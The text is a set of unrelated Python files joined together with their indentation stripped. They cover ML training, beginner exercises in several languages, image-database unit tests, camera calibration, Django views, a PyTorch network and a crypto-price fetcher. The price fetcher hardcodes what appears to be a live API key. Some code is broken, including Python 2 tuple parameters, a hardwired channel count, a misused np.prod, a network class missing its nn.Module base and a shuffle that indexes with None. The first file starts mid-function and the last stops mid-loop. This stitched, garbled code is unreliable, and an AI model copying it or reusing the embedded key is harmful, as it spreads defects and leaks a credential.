precision, recall, fscore, support = precision_recall_fscore_support(labels, y_pred, average='macro');
# print("precision %f recall %f fscore %f"%(precision,recall,fscore));
return precision, recall, fscore, accuracy;
def readTrainFile(fileName):
file = open(fileName, "r");
srcString = file.read();
file.close();
matrix = [];
array = srcString.split("\n");
for line in array:
if (len(line)>1):
matrix.append([float(num) for num in line.split(",")]);
data = np.array(matrix);
return data;
def saveModel(model,fileFormat):
fileName = os.path.join(r'C:\Users\kitrol\Desktop\MachineLearning\models','model_%s.pickle'%fileFormat);
if os.path.isfile(fileName):
os.remove(fileName);
with open(fileName, 'wb') as modelFile:
pickle.dump(model,modelFile);
def main(argv):
if len(argv) < 2:
usage="Usage: \n 1 Parameters are needed:\n train **.csv file needed "
print(usage);
return False;
randomSeed = 123123;
fileName = argv[1];
trainData = readTrainFile(fileName);
features = trainData[:,:-1];
truth = trainData[:,-1];
hidden_units = features.shape[1];#features for one node
X_train, X_test, y_train, y_test = train_test_split(features, truth, test_size=0.7, random_state=randomSeed);
hidden_layers = (hidden_units,hidden_units,hidden_units,hidden_units,hidden_units,);
clf = MLPClassifier(activation='relu', alpha=1e-05, batch_size='auto',
beta_1=0.9, beta_2=0.999, early_stopping=False,
epsilon=1e-08, hidden_layer_sizes=hidden_layers, learning_rate='invscaling', #(20,20,20,20,10,5)
learning_rate_init=0.001, max_iter=2000,
nesterovs_momentum=True, power_t=0.5, random_state=1, shuffle=True,
solver='adam', tol=0.00001, validation_fraction=0.2, verbose=False,
warm_start=False)
clf.fit(X_train, y_train);
precision_train,recall_train,fscore_train,accuracy_train = predictForData(clf,X_train,y_train);
precision_test,recall_test,fscore_test,accuracy_test =predictForData(clf,X_test,y_test);
# print("precision %f,%f,%f\n"%(precision_train,precision_cv,precision_test));
# print("recall %f,%f,%f\n"%(recall_train,recall_cv,recall_test));
print("fscore %f,%f\n"%(fscore_train,fscore_test));
print("accuracy %f,%f\n"%(accuracy_train,accuracy_test));
# print(features.shape);
# features.shape[0] : m train data
# features.shape[1] : n features for one data (bias item included)
# trained model write to file
saveModel(clf,os.path.basename(fileName).split('.')[0]);
if __name__ == '__main__':
main(sys.argv) |
#、提示用户输入要新建的文件,打开文件,
#让用户输入要录入的内容,将内容录入到文件中。
a='txt'
n=input('名称:')
c=[n,a]
n='.'.join(c)
with open(n,'w+')as n_file:
n_file=n_file.write(input('内容:'))
|
N = float(input())
#N = 576.73
#N = 4
#N = 91.01
if (0 <= N <= 1000000.00):
NOTAS = [100, 50, 20, 10, 5, 2]
print("NOTAS:") #TEM QUE TA IGUAL A SAIDA DO PROBLEMA
for i in range(len(NOTAS)):
qtd_nota = int(N / NOTAS[i]) # valor informado divido pelo valor do indice atual é a qtd de nota em questão
print(qtd_nota,"nota(s) de R$", "{:.2f}".format(NOTAS[i]) )
# subtrarir a diferença das notas colocadas acima
N -= qtd_nota * NOTAS[i]
# o mesmo raciocinio aplica-se as muedas
MOEDAS = [1, 0.5, 0.25, 0.10, 0.05, 0.01]
print("MOEDAS:")
#print("%.2f"%N)
for i in range(len(MOEDAS)):
qtd_nota = int(N / MOEDAS[i]) # valor informado divido pelo valor do indice atual é a qtd de nota em questão
print(qtd_nota,'moeda(s) de R$', "{:.2f}".format(MOEDAS[i]))
# subtrarir a diferença das notas colocadas acima
N -= qtd_nota * MOEDAS[i]
N = round(N,2)
"{:.2f}".format(5)
else:
print("dinheiro invalido, ta dando certo nao carai, tenta de novo ai")
|
import unittest
import testutil
import subprocess
import shutil
import os
import hdbfs
class InsertCases( testutil.TestCase ):
def setUp( self ):
self.init_env()
def tearDown( self ):
self.uninit_env()
def _run( self, files, album = None, text = None, taglist = [],
newtags = [], recover = None, name = None ):
cmd = [ 'python', 'scripts/insertfile.py', '-c', self.cfg_file_path ]
if( album is not None ):
cmd.append( '-a' )
if( len( album ) == 0 ):
cmd.append( '-' )
else:
cmd.append( album )
if( text is not None ):
cmd.append( '-x' )
cmd.append( text )
if( len( taglist ) > 0 ):
tags = ','.join( taglist )
cmd.append( '-t' )
cmd.append( tags )
if( len( newtags ) > 0 ):
tags = ','.join( newtags )
cmd.append( '-T' )
cmd.append( tags )
if( recover is not None ):
cmd.append( '-r' )
if( name is not None ):
cmd.append( '-n' )
cmd.append( name )
if( isinstance( files, str ) ):
cmd.append( files )
else:
cmd.extend( files )
subprocess.check_call( cmd )
def test_add( self ):
black = self._load_data( self.black )
self._run( black )
self.assertFalse( os.path.exists( black ),
'Old image was not removed' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
def test_double_add( self ):
black = self._load_data( self.black )
self._run( black )
self.assertFalse( os.path.exists( black ),
'Old image was not removed' )
black = self._load_data( self.black )
self._run( black )
self.assertTrue( os.path.exists( black ),
'Double image was removed' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
def test_recover_not_in_db( self ):
black = self._load_data( self.black )
self._run( black, recover = True )
self.assertTrue( os.path.exists( black ),
'Image was removed' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertTrue( obj is None,
'Image in DB' )
def test_recover_ok_file( self ):
black = self._load_data( self.black )
self._run( black )
self.assertFalse( os.path.exists( black ),
'Old image was not removed' )
black = self._load_data( self.black )
self._run( black, recover = True )
self.assertTrue( os.path.exists( black ),
'Recovery image was removed' )
def test_recover_missing_file( self ):
black = self._load_data( self.black )
self._run( black )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
s = obj.get_root_stream()
h.imgdb.delete( s.get_stream_id(),
s.get_priority(),
s.get_extension() )
h.imgdb.commit()
img_fd = obj.get_root_stream().read()
self.assertFalse( img_fd is not None,
'Remove failed' )
black = self._load_data( self.black )
self._run( black, recover = True )
self.assertTrue( self._diff_data( obj.get_root_stream().read(), self.black ),
'Image not recovered' )
self.assertFalse( os.path.exists( black ),
'Recovery image was not removed' )
def test_no_name( self ):
black = self._load_data( self.black )
self._run( black, name = 'noset' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
self.assertTrue( obj.get_name() is None,
'Name loaded' )
def test_name( self ):
black = self._load_data( self.black )
self._run( black )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
self.assertEqual( obj.get_name(), self.black,
'Name not loaded' )
def test_name2( self ):
black = self._load_data( self.black )
self._run( black, name = 'setundef' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
self.assertEqual( obj.get_name(), self.black,
'Name not loaded' )
def test_different_names( self ):
black = self._load_data( self.black )
self._run( black )
black2 = self._load_data( self.black, 'altname.png' )
self._run( black2 )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
names = obj.get_origin_names()
self.assertTrue( self.black in names,
'First name not loaded' )
self.assertTrue( 'altname.png' in names,
'Second name not loaded' )
self.assertEqual( len( names ), 2,
'Name count does not match' )
def test_load_name( self ):
black = self._load_data( self.black )
self._run( black, name = 'noset' )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertFalse( obj is None,
'Image not in DB' )
self.assertTrue( obj.get_name() is None,
'Name loaded when it shouldn\'t have been' )
h.close()
black = self._load_data( self.black )
self._run( black )
h = hdbfs.Database()
obj = h.get_object_by_id( 1 )
self.assertEqual( obj.get_name(), self.black,
'name not loaded' )
def test_tag_file( self ):
h = hdbfs.Database()
h.enable_write_access()
tag = h.make_tag( 'black' )
files = tag.get_files()
self.assertEqual( len( files ), 0,
'Unexpected number of files' )
h.close()
black = self._load_data( self.black )
self._run( black, taglist = [ 'black' ] )
h = hdbfs.Database()
tag = h.get_tag( 'black' )
files = tag.get_files()
self.assertEqual( len( files ), 1,
'Unexpected number of files' )
def test_create_tag( self ):
h = hdbfs.Database()
black = self._load_data( self.black )
self._run( black, newtags = [ 'black' ] )
h = hdbfs.Database()
try:
tag = h.get_tag( 'black' )
except KeyError:
self.fail( 'Failed creating tag' )
except StopIteration:
pass
files = tag.get_files()
self.assertEqual( len( files ), 1,
'Unexpected number of files' )
def test_tag_multi_file( self ):
h = hdbfs.Database()
h.enable_write_access()
h.make_tag( 'magenta' )
h.make_tag( 'yellow' )
h.make_tag( 'cyan' )
h.close()
red = self._load_data( self.red )
green = self._load_data( self.green )
blue = self._load_data( self.blue )
self._run( red, taglist = [ 'magenta', 'yellow' ] )
self._run( green, taglist = [ 'yellow', 'cyan' ] )
self._run( blue, taglist = [ 'magenta', 'cyan' ] )
h = hdbfs.Database()
mt = h.get_tag( 'magenta' )
yt = h.get_tag( 'yellow' )
ct = h.get_tag( 'cyan' )
ro = h.get_object_by_id( 4 )
go = h.get_object_by_id( 5 )
bo = h.get_object_by_id( 6 )
magenta = mt.get_files()
yellow = yt.get_files()
cyan = ct.get_files()
self.assertEqual( len( magenta ), 2,
'Unexpected number of files (magenta)' )
self.assertEqual( len( yellow ), 2,
'Unexpected number of files (yellow)' )
self.assertEqual( len( cyan ), 2,
'Unexpected number of files (cyan)' )
self.assertTrue( ro in magenta,
'Red not in magenta' )
self.assertTrue( bo in magenta,
'Blue not in magenta' )
self.assertTrue( ro in yellow,
'Red not in yellow' )
self.assertTrue( go in yellow,
'Green not in yellow' )
self.assertTrue( go in cyan,
'Green not in cyan' )
self.assertTrue( bo in cyan,
'Blue not in cyan' )
red_in = ro.get_tags()
green_in = go.get_tags()
blue_in = bo.get_tags()
self.assertEqual( len( red_in ), 2,
'Unexpected number of tags (red)' )
self.assertEqual( len( green_in ), 2,
'Unexpected number of tags (green)' )
self.assertEqual( len( blue_in ), 2,
'Unexpected number of tags (blue)' )
self.assertTrue( mt in red_in,
'Red does not have magenta' )
self.assertTrue( yt in red_in,
'Red does not have yellow' )
self.assertTrue( yt in green_in,
'Green does not have yellow' )
self.assertTrue( ct in green_in,
'Green does not have cyan' )
self.assertTrue( mt in blue_in,
'Blue does not have magenta' )
self.assertTrue( ct in blue_in,
'Blue does not have cyan' )
def test_make_album( self ):
white = self._load_data( self.white )
grey = self._load_data( self.grey )
black = self._load_data( self.black )
self._run( [ white, grey, black ], album = 'bw' )
h = hdbfs.Database()
al = h.get_object_by_id( 1 )
wo = h.get_object_by_id( 2 )
lo = h.get_object_by_id( 3 )
ko = h.get_object_by_id( 4 )
self.assertTrue( isinstance( al, hdbfs.Album ),
'Expected album' )
files = al.get_files()
self.assertTrue( wo in files,
'White not in album' )
self.assertTrue( lo in files,
'Grey not in album' )
self.assertTrue( ko in files,
'Black not in album' )
def test_tag_album( self ):
h = hdbfs.Database()
h.enable_write_access()
tag = h.make_tag( 'bw' )
h.close()
white = self._load_data( self.white )
grey = self._load_data( self.grey )
black = self._load_data( self.black )
self._run( [ white, grey, black ], album = 'bw', taglist = [ 'bw' ] )
h = hdbfs.Database()
al = h.get_object_by_id( 2 )
wo = h.get_object_by_id( 3 )
lo = h.get_object_by_id( 4 )
ko = h.get_object_by_id( 5 )
self.assertTrue( isinstance( al, hdbfs.Album ),
'Expected album' )
query = hdbfs.query.Query()
query.add_require_constraint( hdbfs.query.TagConstraint( 'bw' ) )
it = query.execute( h ).__iter__()
self.assertEqual( it.next(), al,
'Unexpected tagged item' )
try:
it.next()
self.fail( 'Unexpected tagged item' )
except StopIteration:
pass
def test_album_text( self ):
white = self._load_data( self.white )
grey = self._load_data( self.grey )
black = self._load_data( self.black )
bw_desc = self._load_data( self.bw_desc )
self._run( [ white, grey, black ], album = 'bw', text = bw_desc )
h = hdbfs.Database()
query = hdbfs.query.Query()
query.set_type( hdbfs.TYPE_ALBUM )
al = query.execute( h ).__iter__().next()
self.assertTrue( isinstance( al, hdbfs.Album ),
'Expected album' )
textf = open( bw_desc, 'r' )
text = textf.read( 256 )
textf.close()
self.assertEqual( text, al.get_text(),
'Text not loaded' )
if( __name__ == '__main__' ):
unittest.main()
|
n = int(input())
A = sorted(int(i) for i in input().split())
i = n - 3
while i >= 0 and (A[i] + A[i + 1] <= A[i + 2]):
i -= 1
if i >= 0:
print(A[i], A[i + 1], A[i + 2])
else:
print(-1)
|
# Day 3: Toboggan Trajectory
# <ryc> 2021
def inputdata( ):
stream = open( 'day_03_2020.input' )
data = [ line[ : -1 ] for line in stream ] # space drop
stream.close( )
return data
def toboggan( data, delta_x, delta_y ):
tree = 0
x = 0
y = 0
width_pattern = len( data[ 0 ] )
height_pattern = len( data )
while y < height_pattern - delta_y:
x += delta_x
x %= width_pattern
y += delta_y
if data[ y ][ x ] == '#':
tree += 1
#print( tree ,y ,x , data[y])
return tree
if __name__ == '__main__':
print( '\nDay 3: Toboggan Trajectory' )
data = inputdata( )
scopes = ( ( 1, 1 ), ( 3, 1 ), ( 5, 1 ), ( 7, 1 ), ( 1, 2 ) )
total = 1
for ( right, down ) in scopes:
tree = toboggan( data, right, down )
total *= tree
print( f'\nToboggan right = { right } down = { down } : { tree }' )
print( "\nTotal =", total )
|
from ._visible import VisibleValidator
from ._valuessrc import ValuessrcValidator
from ._values import ValuesValidator
from ._ticktextsrc import TicktextsrcValidator
from ._ticktext import TicktextValidator
from ._label import LabelValidator
from ._displayindex import DisplayindexValidator
from ._categoryorder import CategoryorderValidator
from ._categoryarraysrc import CategoryarraysrcValidator
from ._categoryarray import CategoryarrayValidator
|
class Persona:
def __init__(self,nombre):
self.nombre = nombre
def avanza(self):
print('ando caminando')#polimorfismo
class Ciclista(Persona):
def __init__(self,nombre):
super().__init__(nombre)
def avanza(self):
print('estoy conduciendo mi bicla')#polimorfismo
def main():#punto de entrada
persona = Persona('David')
persona.avanza()
ciclista = Ciclista('Daniel')
ciclista.avanza()
if __name__ =='__main__':
main() |
import cv2
import numpy as np
from find_chessboard import find_chessboard
def visualize_distortion(camera_matrix, dist_coefs, (width, height), alpha=0.0):
camera_matrix, _ = cv2.getOptimalNewCameraMatrix(camera_matrix, dist_coefs,
(width, height), alpha)
img = np.ones((height, width), dtype=np.uint8) * 255
for y in range(0, height, 10):
cv2.line(img, (0, y), (width - 1, y), (0, 0, 0))
for x in range(0, width, 10):
cv2.line(img, (x, 0), (x, height - 1), (0, 0, 0))
img = cv2.undistort(img, camera_matrix, dist_coefs)
cv2.imshow("Distortion with alpha="+str(alpha), img)
if __name__ == '__main__':
obj_points = []
img_points = []
for i in range(1,3):
img = cv2.imread("../images/chessboard%i.jpg" % i)
h,w = img.shape[:2]
found, result_img, pattern_points, corner_points = find_chessboard(img, square_size=0.05, pattern_size=(9, 6))
if found:
obj_points.append(pattern_points)
img_points.append(corner_points)
rms, camera_matrix, dist_coefs, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, (w, h))
print "RMS:", rms
print "camera matrix:\n", camera_matrix
print "distortion coefficients: ", dist_coefs
print
h,w = img.shape[:2]
visualize_distortion(camera_matrix, dist_coefs, (w, h), alpha=0.0)
visualize_distortion(camera_matrix, dist_coefs, (w, h), alpha=1.0)
#
# Now some undistort methods for the last image
#
# undistort the last image
distorted_img = img
img_points = img_points[-1]
obj_points = obj_points[-1]
rvec = rvecs[-1]
tvec = tvecs[-1]
opt_camera_matrix, _ = cv2.getOptimalNewCameraMatrix(camera_matrix, dist_coefs, (w, h), alpha=0)
undistorted_img = cv2.undistort(distorted_img, opt_camera_matrix, dist_coefs)
# version 1, using world coordinates, distorted image, calibrated camera matrix and distortion coefficients
points, _ = cv2.projectPoints(obj_points, rvec, tvec, camera_matrix, dist_coefs)
for point in points:
point = np.rint(point.flatten()).astype(int)
red_color = (0, 0, 255)
cv2.circle(distorted_img, tuple(point), 2, red_color, -1)
# version 2, using world coordinates, undistorted image, calibrated camera matrix and empty distortion coefficients
empty_dist_coefs = np.array([[0.0, 0.0, 0.0, 0.0, 0.0]])
points, _ = cv2.projectPoints(obj_points, rvec, tvec, camera_matrix, empty_dist_coefs)
for point in points:
point = np.rint(point.flatten()).astype(int)
blue_color = (255, 0, 0)
cv2.circle(undistorted_img, tuple(point), 2, blue_color, -1)
# version 3, using image coordinates, undistorted image, calibrated camera matrix and distortion coefficients
for point in img_points:
point = cv2.undistortPoints(np.array([[point]]), camera_matrix, dist_coefs, P=camera_matrix)
point = np.rint(point.flatten()).astype(int)
green_color = (0, 255, 0)
cv2.circle(undistorted_img, tuple(point), 2, green_color, -1)
cv2.imshow('Distorted Image', distorted_img)
cv2.imshow('Undistorted Image', undistorted_img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
from requests import Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
class CoinMarketCap:
def __init__(self):
self.url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
self.headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': 'b277b774-a848-4d0d-87a6-86540d03e015', # free key anyways
}
def get_price(self, coin):
parameters = {
'symbol': coin,
}
session = Session()
session.headers.update(self.headers)
try:
response = session.get(self.url, params=parameters)
data = json.loads(response.text)
price = data['data'][coin]['quote']['USD']['price']
return price
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e) |
"""
Faça um programa que receba um inteiro positivo e imprima a seguinte sequência
de asteriscos de acordo com o numero recebido.
Exemplo:
Entrada: 5
Saída:
*
* *
* * *
* * * *
* * * * *
Entrada: 9
saída:
*
* *
* * *
* * * *
* * * * *
* * * * * *
* * * * * * *
* * * * * * * *
* * * * * * * * *
"""
linhas = int(input("Digite o numero de linhas do padrão: "))
for i in range(linhas):
for j in range(linhas):
if i >= j:
print("* ", end="")#o parâmetro 'end=""' faz com que não haja quebra de linha
else:
print(" ", end="")
print("")
|
import wx
class MCPPackageBase(wx.EvtHandler):
def __init__(self, mcp):
wx.EvtHandler.__init__(self)
self.activated = None
self.callback = None
self.max = 0.0
self.min = 0.0
self.message = ''
self.package = ''
self.mcp = mcp
def Initialize(self):
pass
def mcp_negotiate_end(self):
pass
|
from django.conf.urls import include, url
from djofx import views
urlpatterns = [
url(r'^$', views.home_page, name="djofx_home"),
url(r'^upload/$', views.upload_ofx_file, name="djofx_upload"),
url(r'^account/', include('djofx.urls.account')),
url(r'^categories/', include('djofx.urls.categories')),
url(r'^monthly/', include('djofx.urls.monthly')),
url(r'^transaction/', include('djofx.urls.transaction')),
url(r'^jsreverse/$', 'django_js_reverse.views.urls_js', name='js_reverse'),
]
|
import pandas
from sklearn import linear_model
import csv
# with open('cars.csv', 'w', newline='') as csvfile:
# fieldnames = ['Weight', 'Volume', 'price']
# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
#
# writer.writeheader()
# writer.writerow({'Volume': 2300 , 'Weight': 1300, 'price': 20})
df = pandas.read_csv("ctest.csv")
#
X = df[['Wqueen', 'Bqueen']]
y = df['TF']
regr = linear_model.LinearRegression()
regr.fit(X, y)
#
# #predict the CO2 emission of a car where the weight is 2300kg, and the volume is 1300cm3:
predictedprice = regr.predict([[42, 15]])
#
print(predictedprice) |
import pandas as pd
import numpy as np
# data file name
x_train_name = 'X_train.csv'
y_train_name = 'T_train.csv'
x_test_name = 'X_test.csv'
y_test_name = 'T_test.csv'
def load_data():
"""
Return the data as usual array type
"""
x_train = pd.read_csv(x_train_name).values
y_train = pd.read_csv(y_train_name).values
x_test = pd.read_csv(x_test_name).values
y_test = pd.read_csv(y_test_name).values
return x_train.astype(np.float32), y_train - 1, x_test.astype(np.float32), y_test - 1
def shuffle(arr_x, arr_y):
"""
Shuffle x and y with the same order
"""
idx = np.random.shuffle(np.asarray(range(len(arr_x))))
return arr_x[idx], arr_y[idx]
def to_svm_format(arr_x, arr_y):
"""
Change two array to two list which follow LIBSVM format
"""
list_x = []
list_y = []
for i, row in enumerate(arr_x):
_dict = {}
for j, feature in enumerate(row):
_dict[j + 1] = feature
list_x.append(_dict)
for i, label in enumerate(arr_y):
list_y.append(label[0])
return list_x, list_y
def to_svm_file(list_x, list_y, file_name='train.txt'):
contain = []
for i, feature_dict in enumerate(list_x):
_string = str(list_y[i]) + ' '
for key, feature in feature_dict.items():
_string = _string + str(key) + ':' + str(feature) + ' '
_string += '\n'
contain.append(_string)
with open(file_name, 'w') as f:
f.writelines(contain)
if __name__ == '__main__':
x_train, y_train, x_test, y_test = load_data()
print(np.shape(x_train))
print(x_train[0])
print(y_train[0]) |
import torch
import torch.nn as nn
import torch.nn.functional
from torch.nn import init
from collections import OrderedDict
import numpy as np
class LinearBottleneck(nn.Module):
def __init__(self,inplanes,outplanes,stride,t,activation=nn.ReLU6,kernel_size = [3,3],padding = 1):
'''
:param inplanes:
:param outplanes:
:param stride:
:param t:
:param activation:
'''
'''
首先利用点卷积升维,然后利用深度卷积计算,最后利用点卷积降维,每个卷积后跟着BN和激活函数
'''
super(LinearBottleneck,self).__init__()
self.conv1 = nn.Conv2d(inplanes,t*inplanes,kernel_size=1,bias=False)
self.bn1 = nn.BatchNorm2d(inplanes*t)
self.conv2 = nn.Conv2d(inplanes*t,inplanes*t,kernel_size=kernel_size,stride=stride,padding=padding,bias=False,groups=t*inplanes)
self.bn2 = nn.BatchNorm2d(inplanes*t)
self.conv3 = nn.Conv2d(inplanes*6,outplanes,kernel_size=1,bias=False)
self.bn3 = nn.BatchNorm2d(outplanes)
self.activation = activation(inplace=True)
self.inplanes = inplanes
self.outplanes = outplanes
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.activation(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.activation(out)
out = self.conv3(out)
out = self.bn3(out)
#out = self.activation(out)
if self.stride==1 and self.inplanes==self.outplanes:
out = out+residual
return out
class SPP(nn.Module):
def __init__(self,in_channels):
nn.Module.__init__(self)
self.pool1 = x1 = nn.AvgPool2d([16,16])
self.pool2 = nn.AvgPool2d([8,8])
self.pool3 = nn.AvgPool2d([2,2])
self.conv1 = nn.Conv2d(in_channels,in_channels, kernel_size=1, stride=1, bias=False,
groups=in_channels)
self.conv2 = nn.Conv2d(in_channels,in_channels//3,kernel_size=1,bias=False)
self.conv3 = nn.Conv2d(in_channels,in_channels, kernel_size=1, stride=1, bias=False,
groups=in_channels)
self.conv4 = nn.Conv2d(in_channels, in_channels // 3, kernel_size=1, bias=False)
self.conv5 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False,
groups=in_channels)
self.conv6 = nn.Conv2d(in_channels, in_channels // 3, kernel_size=1, bias=False)
#torch.nn.functional.interpolate(input, size=None, scale_factor=None, mode='nearest', align_corners=None)
def forward(self, x):
x_size = x.size()[2:]
out = x
x1 = self.pool1(x)
x2 = self.pool2(x)
x3 = self.pool3(x)
x1 = self.conv1(x1)
x1 = self.conv2(x1)
x2 = self.conv3(x2)
x2 = self.conv4(x2)
x3 = self.conv5(x3)
x3 = self.conv6(x3)
x1 = nn.functional.interpolate(x1, size=x_size, mode='bilinear',align_corners=True)
x2 = nn.functional.interpolate(x2, size=x_size, mode='bilinear',align_corners=True)
x3 = nn.functional.interpolate(x3, size=x_size, mode='bilinear',align_corners=True)
x4 = torch.cat([x1,x2,x3,out],1)
return x4
base = {'352': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512]}
def vgg16(cfg, inchannels, batch_norm=False):
layer = []
inchannels = inchannels
for v in cfg:
if v == 'M':
layer += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = LinearBottleneck(inchannels,v,stride=1,t=6)
if batch_norm:
layer += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layer += [conv2d, nn.ReLU(inplace=True)]
inchannels = v
return layer
class LANet(nn.Module):#相当于生成器
def __init__(self,vgg=vgg16(base['352'],3),spp=SPP(512)):
nn.Module.__init__(self)
self.vgg = nn.ModuleList(vgg)
self.spp = spp
self.conv = LinearBottleneck(1022,512,1,6)
self.convLast = LinearBottleneck(512, 1, 1, 6)
def forward(self,x):
for i in range(len(self.vgg)):
x = self.vgg[i](x)
x = self.spp(x)
x = self.conv(x)
x = self.convLast(x)
x = nn.functional.interpolate(x,scale_factor=16)#decoder
return x
class Discriminate():
def __init__(self):
super(Discriminate,self).__init__()
self.linearBottleneck1 = LinearBottleneck(3,32,stride=1,t=6,padding = 2,kernel_size=[5, 5])
self.linearBottleneck2 = LinearBottleneck(32,32,stride=1,t=6,padding = 2,kernel_size=[5, 5])
self.linearBottleneck3 = LinearBottleneck(1,32,stride=1,t=6,padding = 2,kernel_size=[5, 5])
self.linearBottleneck4 = LinearBottleneck(64,64,stride=1,t=6,padding = 1,kernel_size=[3, 3])
self.linearBottleneck5 = LinearBottleneck(64, 64, stride=2, t=6, padding=1, kernel_size=[3, 3])
self.linearBottleneck6 = LinearBottleneck(64, 128, stride=2, t=6, padding=1, kernel_size=[3, 3])
self.linearBottleneck7 = LinearBottleneck(128, 128, stride=2, t=6, padding=1, kernel_size=[3, 3])
self.fc = nn.Sequential(
nn.Linear(int(np.prod(32,32,128)), 512),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(512, 256),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(256, 1),
nn.Sigmoid(),
)
def forward(self,img,mask):
x1 = self.linearBottleneck1(img)
x1 = self.linearBottleneck2(x1)
x2 = self.linearBottleneck3(mask)
x3 = torch.cat([x1,x2],1)
x3 = self.linearBottleneck4(x3)
x3 = self.linearBottleneck5(x3)
x3 = self.linearBottleneck6(x3)
x3 = self.fc(x3)
return x3
def xavier(param):
init.xavier_uniform_(param)
def weights_init(m):
if isinstance(m, nn.Conv2d):
xavier(m.weight.data)
m.bias.data.zero_()
|
"""Runs the dialog pipeline by having creating a dialog agent and having it
engage in a conversation with a user through terminal.
"""
from __future__ import absolute_import
import logging
from dialog.argument_parser import dialog_arguments_parser
from dialog.configs import DialogConfiguration
from dialog.dialog_agent import DialogAgent
from dialog.dialog_policy import DialogPolicy
from dialog.dialog_state import DialogState
from dialog.input_output import Input, Output
from dialog.label_description import LabelDescription
from dialog.intention import Intention
from dialog.utterance_parser import UtteranceParser
from parser.action_channel_model import ActionChannelModel
from parser.action_function_model import ActionFunctionModel
from parser.combined_model import CombinedModel
from parser.keyword_model import KeywordModel
from parser.trigger_function_model import TriggerFunctionModel
from parser.trigger_channel_model import TriggerChannelModel
from tracker.dialog_tracker import DialogTracker
def parse_arguments():
args = dialog_arguments_parser().parse_args()
logging.basicConfig(level=getattr(logging, args.log_level.upper()),
format='%(levelname)s: %(asctime)s: %(message)s')
assert(args.alpha >= args.beta)
DialogConfiguration.alpha = args.alpha
DialogConfiguration.beta = args.beta
def load_trigger_channel_parser():
args = CombinedModel.t_channel_args
return CombinedModel.create_ensemble(args, TriggerChannelModel)
def load_action_channel_parser():
args = CombinedModel.a_channel_args
return CombinedModel.create_ensemble(args, ActionChannelModel)
def load_trigger_fn_parser():
args = CombinedModel.t_fn_args
return CombinedModel.create_ensemble(args, TriggerFunctionModel)
def load_action_fn_parser():
args = CombinedModel.a_fn_args
return CombinedModel.create_ensemble(args, ActionFunctionModel)
def load_keyword_parser():
return KeywordModel()
def load_parsers():
logging.debug("Loading parsers.")
trigger_channel_parser = load_trigger_channel_parser()
action_channel_parser = load_action_channel_parser()
trigger_fn_parser = load_trigger_fn_parser()
action_fn_parser = load_action_fn_parser()
keyword_parser = load_keyword_parser()
logging.info("All parsers loaded.")
return (trigger_channel_parser, action_channel_parser, trigger_fn_parser,
action_fn_parser, keyword_parser)
def create_dialog_agent(trigger_channel_parser, action_channel_parser,
trigger_fn_parser, action_fn_parser, keyword_parser,
istream, ostream):
logging.info("Initializing dialog agent.")
label_description = LabelDescription()
parser = UtteranceParser(trigger_channel_model=trigger_channel_parser,
action_channel_model=action_channel_parser,
trigger_fn_model=trigger_fn_parser,
action_fn_model=action_fn_parser,
keyword_model=keyword_parser,
label_description=label_description)
intention = Intention
dialog_policy = DialogPolicy(DialogConfiguration)
dialog_state = DialogState()
tracker = DialogTracker()
dialog_agent = DialogAgent(state=dialog_state, policy=dialog_policy,
parser=parser, intention=intention,
label_description=label_description,
istream=istream, ostream=ostream,
tracker=tracker)
return dialog_agent
def main():
parse_arguments()
t_channel_parser, a_channel_parser, t_fn_parser, a_fn_parser, \
keyword_parser = load_parsers()
while True:
dialog_agent = create_dialog_agent(
trigger_channel_parser=t_channel_parser,
trigger_fn_parser=t_fn_parser,
action_channel_parser=a_channel_parser,
action_fn_parser=a_fn_parser,
keyword_parser=keyword_parser, istream=Input(), ostream=Output())
dialog_agent.start_session()
if __name__ == '__main__':
main()
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
return HttpResponse("polls的首页")
def detail(request, question_id):
return HttpResponse("你正在看question {},的详细页".format(question_id))
def results(request, question_id):
return HttpResponse("你在看问题{}的投票结果".format(question_id))
def vote(request, question_id):
return HttpResponse("你在给问题{}投票".format(question_id))
|
def sum(p):
i = 1
s = 0
while i <= p:
s += i
i += 1
return s
print(sum(10))
print(sum(11))
print(sum(12))
# 檔名: exercise0803.py
# 作者: Kaiching Chang
# 時間: July, 2014
|
count = [0, 1, 2, 3]
for num in count:
print("num = %d"%num)
count = ["one", "two", "three", "four", "five"]
for i in count:
print(i)
#interable => 반복가능객체 => list, tuple, dict
# num = 10
# for i in num:
# print(i)
#튜플
jumsu = (90, 50, 60, 80, 40)
number = 1
for i in jumsu:
if i >= 60:
print("%d번째 학생 : 합격"%number)
else:
print("%d번째 학생 : 불합격"%number)
number += 1
people = {"송새봄":29, "송여름":16, "송가을":32, "송겨울":5}
minor = []
adult = []
#dict는 key만 들고온다!
for i in people:
if people[i] < 20:
print("%s님 : %d살 ==> 미성년자"%(i, people[i]))
minor.append(i)
else:
